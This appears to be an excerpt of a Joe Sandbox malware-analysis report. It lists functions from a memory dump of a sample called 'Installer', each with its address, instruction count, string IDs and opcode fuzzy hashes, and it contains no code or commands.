                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: -.-2
                                                                                                                                                                                                                                                    • API String ID: 0-2838677626
                                                                                                                                                                                                                                                    • Opcode ID: 84298f2c1df00ac477d8c9eb7f651bf770509cc0667fa7c23a1cbe41850e76cc
                                                                                                                                                                                                                                                    • Instruction ID: c65bc0e0fd9ab2b407f4ec274a243cae03b52599eb44c3ec4b920f3608bc9bdb
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 84298f2c1df00ac477d8c9eb7f651bf770509cc0667fa7c23a1cbe41850e76cc
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 08912770694B804FE335CF768880763BBE3AB96314F18896DD0D28BB95DB79E446CB14
                                                                                                                                                                                                                                                    Function 0042B100 Relevance: 1.5, Strings: 1, Instructions: 236COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: "
                                                                                                                                                                                                                                                    • API String ID: 0-123907689
                                                                                                                                                                                                                                                    • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                    • Instruction ID: 981523987b1e43f0f2fbc980dbd505f4044b7fe8cc5f065e6a15477f38c1429d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4071C632B083258BD714CE28E49032FB7E2EBC5750FA9856EE89497395D338DD4587CA
                                                                                                                                                                                                                                                    Function 0043E9B3 Relevance: 1.3, Strings: 1, Instructions: 97COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: v4vE
                                                                                                                                                                                                                                                    • API String ID: 0-866190975
                                                                                                                                                                                                                                                    • Opcode ID: 7b64acfa24e2befdd8ac35dee43b38dc2d497a1a5a96ae3d147eba01d7514725
                                                                                                                                                                                                                                                    • Instruction ID: 34cdfc8a34f78da73259cccf7ab61d51709751dea84dcafbc9ea7b9c9e951e0c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7b64acfa24e2befdd8ac35dee43b38dc2d497a1a5a96ae3d147eba01d7514725
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D631F4B6A183005BF708DF76AC8255BBAF3EBD5304F19C43DD185D7215EA38C1068B4A
                                                                                                                                                                                                                                                    Function 00426513 Relevance: 1.3, Strings: 1, Instructions: 64COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: /kB
                                                                                                                                                                                                                                                    • API String ID: 0-3532343839
                                                                                                                                                                                                                                                    • Opcode ID: b4b5b7e280f642f85b3dfe5987f8b3969132ef151dffa41fcba20c5fda879f96
                                                                                                                                                                                                                                                    • Instruction ID: 30b78e98d0376e77b4dedd947e5e84c4a76dc6197d8d4778f9e0425fae07882d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b4b5b7e280f642f85b3dfe5987f8b3969132ef151dffa41fcba20c5fda879f96
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EA1159B4E093649FC320AB25A8D017B76A5DF97314F85852FF9C367361EA3C9C02C65A
                                                                                                                                                                                                                                                    Function 004074A0 Relevance: .6, Instructions: 611COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: cfa9a842e54d6f6908c7b800668eb5eb2d5e9b27e34123646e38c57c34ffb93e
                                                                                                                                                                                                                                                    • Instruction ID: 53bedda06ccc27c303568f9e7e6bd49d427b81707e73c2342d6127383662a74f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cfa9a842e54d6f6908c7b800668eb5eb2d5e9b27e34123646e38c57c34ffb93e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4F12B472A087118BC725DF18D8806ABB3E1BFC4315F19893ED9C6A7385D738B8558B87
                                                                                                                                                                                                                                                    Function 0041D050 Relevance: .5, Instructions: 471COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: ba2a651c7b4397c0272f4726fbccc838470ac406de1116525d09835cc8aaf273
                                                                                                                                                                                                                                                    • Instruction ID: 06ba914754fda528d7acfc96047ccc351decbac5893a7f6043ce80427adf6e18
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ba2a651c7b4397c0272f4726fbccc838470ac406de1116525d09835cc8aaf273
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 02C123B5A183118BD728DF28CC526ABB7F1EFD5314F08862DE8958B384E73C9944C795
                                                                                                                                                                                                                                                    Function 0043A9D6 Relevance: .5, Instructions: 464COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: fb2c410d40d8a7215a23457b42f4989fe7a875ffa95cad037c50274c93334019
                                                                                                                                                                                                                                                    • Instruction ID: 6ff10e554b56e7d98c0354463b113c8fe134109c80e7cf3690ca443259b71b45
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fb2c410d40d8a7215a23457b42f4989fe7a875ffa95cad037c50274c93334019
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 91E1397AA68226CBCB189F24D85116B73F2FF4A751F0BC97DD881472A0E7398960C746
                                                                                                                                                                                                                                                    Function 00405930 Relevance: .4, Instructions: 448COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 8469296e2ad6377bca0d66c7fdbce60c96d239fa905cce4d846bf08553cb04b8
                                                                                                                                                                                                                                                    • Instruction ID: 5dc1153c2cae88f14e706d6766014c5310a85aff0076e014daa1ca1314a98a54
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8469296e2ad6377bca0d66c7fdbce60c96d239fa905cce4d846bf08553cb04b8
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5DF1BD756087418FD724CF29C88076BBBE2EFD9304F08882DE5D597391E639E944CB96
                                                                                                                                                                                                                                                    Function 00428307 Relevance: .4, Instructions: 350COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 0e71ddd8efcb11a8d109418157ab47fde1022d2a01cbd6712a0ad8640d730c20
                                                                                                                                                                                                                                                    • Instruction ID: a954b38a6bb1ce87cf69874cc4df31a0facd51f51a0102f5d1bcd2fc66b16d63
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0e71ddd8efcb11a8d109418157ab47fde1022d2a01cbd6712a0ad8640d730c20
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CFA1F476B096114FD71CCF2AD81132FB6D3ABD4310F5A853EE88AC7395DE74E8128685
                                                                                                                                                                                                                                                    Function 004410D0 Relevance: .3, Instructions: 269COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                                                                                    • Opcode ID: 1d4ee9170cb315f71c8184b5a82f458173e5dc386eddf8c79e1ec2de4589c0f9
                                                                                                                                                                                                                                                    • Instruction ID: 48af3df080d7374f24d22ba405b18466128ca7b67be3218363250a1880df35ed
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1d4ee9170cb315f71c8184b5a82f458173e5dc386eddf8c79e1ec2de4589c0f9
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8D91DF756083019BE718DF18C490A2BB3E2FF89750F15846EEA85DB361EB34DC41DB8A
                                                                                                                                                                                                                                                    Function 004409E0 Relevance: .2, Instructions: 238COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 2081274b20256b51a48b52e86fac1d0e917b6bc8052939e7a96106f21d596131
                                                                                                                                                                                                                                                    • Instruction ID: 396e9f4d8292420b39720d4ebe7e3b2ba50298b7ad3af056df74e370846adae9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2081274b20256b51a48b52e86fac1d0e917b6bc8052939e7a96106f21d596131
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4F71353560C2A59FC7048F39D8512AABBE3EBCA314F49896DE8D887350D739DD11CB89
                                                                                                                                                                                                                                                    Function 0041F2C0 Relevance: .2, Instructions: 204COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: e2ef3ed592ffea8117d6535c71c633ebd8baee3f6d97b41eb70e06c6ff45de06
                                                                                                                                                                                                                                                    • Instruction ID: 7de542bc9115ef73e19b3091658d28cf0780ac80647d3c93e3c636ac7a511b7b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e2ef3ed592ffea8117d6535c71c633ebd8baee3f6d97b41eb70e06c6ff45de06
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 99614A355083914FD7258F29C84096B7BE0ABA6314F4882BEE8E84B392D635DC4AC796
                                                                                                                                                                                                                                                    Function 0043A640 Relevance: .2, Instructions: 152COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 6d1fab72e9f5b1cdff51703c3b7269aa68bcba2dda9f3549e373aaeca11e4806
                                                                                                                                                                                                                                                    • Instruction ID: 66fd862550092496dbaeb2d3bb1543f7b4ae7d39c68e2cc44db9a05b1b136551
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6d1fab72e9f5b1cdff51703c3b7269aa68bcba2dda9f3549e373aaeca11e4806
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8C3123B5A04300AFE7109E119CC1B3BB7B5EB89758F10182EF9C5A3201D339EC26879B
                                                                                                                                                                                                                                                    Function 00408B00 Relevance: .1, Instructions: 143COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 83a46eb97a1ede892c521cd0a1cf27060ef79bfacc0411b261445066a2a95deb
                                                                                                                                                                                                                                                    • Instruction ID: 37f3efdb486df1b50b7503efc8676e0e0480c9f1302ca175b3bd99bebac416ea
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 83a46eb97a1ede892c521cd0a1cf27060ef79bfacc0411b261445066a2a95deb
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DF4190216493494BEB14CD2889815E77B61DBA2350F08C63EECC55B3C1EA3CDA0AD3A9
                                                                                                                                                                                                                                                    Function 0043F7B2 Relevance: .1, Instructions: 138COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: b8bd4d7e9bd20bf13d05e542f28e56da8f4d605b247b1b6829d47043411abe16
                                                                                                                                                                                                                                                    • Instruction ID: 65860a534bcdc61a69b891c8f4b112b5ccb7c4aa6a6d252a23f247d29c97b397
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b8bd4d7e9bd20bf13d05e542f28e56da8f4d605b247b1b6829d47043411abe16
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F8410436F245554BDB0CCF6888A157FBAB2AB8E310F19E13EC556E7354CB3899058788
                                                                                                                                                                                                                                                    Function 0040DE13 Relevance: .1, Instructions: 119COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                                                                                    • Opcode ID: 7429881085838c9e2ea473406c0e777441f7560d71a7cb9971c1e3e1e517dda0
                                                                                                                                                                                                                                                    • Instruction ID: 8192ad4da6690d975133d58e89ccec5cc32f62d7e28f0f863b58bcb031853df0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7429881085838c9e2ea473406c0e777441f7560d71a7cb9971c1e3e1e517dda0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 64313938B556018FC725CB68CCC0B3673A3EBD6315B589639E092673D6DB38E8068788
                                                                                                                                                                                                                                                    Function 004292E0 Relevance: .1, Instructions: 110COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 8820827ab3717a503f23ee1f329a572c2ac425d8331617b1f9b573c8837ef006
                                                                                                                                                                                                                                                    • Instruction ID: 6483a22a6f500d058f9f4f03b7d1e0b0debdf2b506a58ba5144e8a59cc6fe5a8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8820827ab3717a503f23ee1f329a572c2ac425d8331617b1f9b573c8837ef006
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DF31C432E00125CFCB14CF64C8516AFB7B2FF46310F19959AD842AB3A1DB385D01CB94
                                                                                                                                                                                                                                                    Function 004393C0 Relevance: .1, Instructions: 92COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 311bccfb7c94d63f981d42372d52fcc226d8c5098601f3624a1e21d790acd581
                                                                                                                                                                                                                                                    • Instruction ID: daeb1bb460313cd135989d5d7c02351c17a175b5b9fd5c5575e707a8a0bfda13
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 311bccfb7c94d63f981d42372d52fcc226d8c5098601f3624a1e21d790acd581
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3C1178217082110AC3249BA9C8C1177F399DBDE724F19967BD9C08F292E2B8CC42C3D5
                                                                                                                                                                                                                                                    Function 00436370 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                                                    • Instruction ID: 91ac4c5b143b02c7d32e682e2a6aab4e0f1bc94368da354689b67666a2c00c8c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6311EC336451D50EC3168D3C84005A67FA30B97234F1AD39EF8B49B2D3D7278D8A8359
                                                                                                                                                                                                                                                    Function 0042A660 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 2ee26b68ca80d359eea836c05570f0252371bc8a0c72456eea12c8fb01481f6b
                                                                                                                                                                                                                                                    • Instruction ID: 9eb9525df2382ca65ffc71ea0fe4effccc3bbe68bdeaf4085e84a9653100f2a1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2ee26b68ca80d359eea836c05570f0252371bc8a0c72456eea12c8fb01481f6b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A8019EF5B0031247D6209E11A4C4B2BB2A9AF90748F5D443EEC8457342DB7DFC2482AF
                                                                                                                                                                                                                                                    Function 00402B70 Relevance: .1, Instructions: 54COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: d5d295e9ed382b796e59e78ecd7c3973d9fbade591b377e9c3dd8d664adeac99
                                                                                                                                                                                                                                                    • Instruction ID: fe22f187d6262aa03d792ec1030457158b6d731bbaaa7045d526425db3de230e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d5d295e9ed382b796e59e78ecd7c3973d9fbade591b377e9c3dd8d664adeac99
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1D01F46B7A831A0BD700DDBDECD56AAB7A696D5108B1E4139EA80D7781E0B8F8058294
                                                                                                                                                                                                                                                    Function 00425E70 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
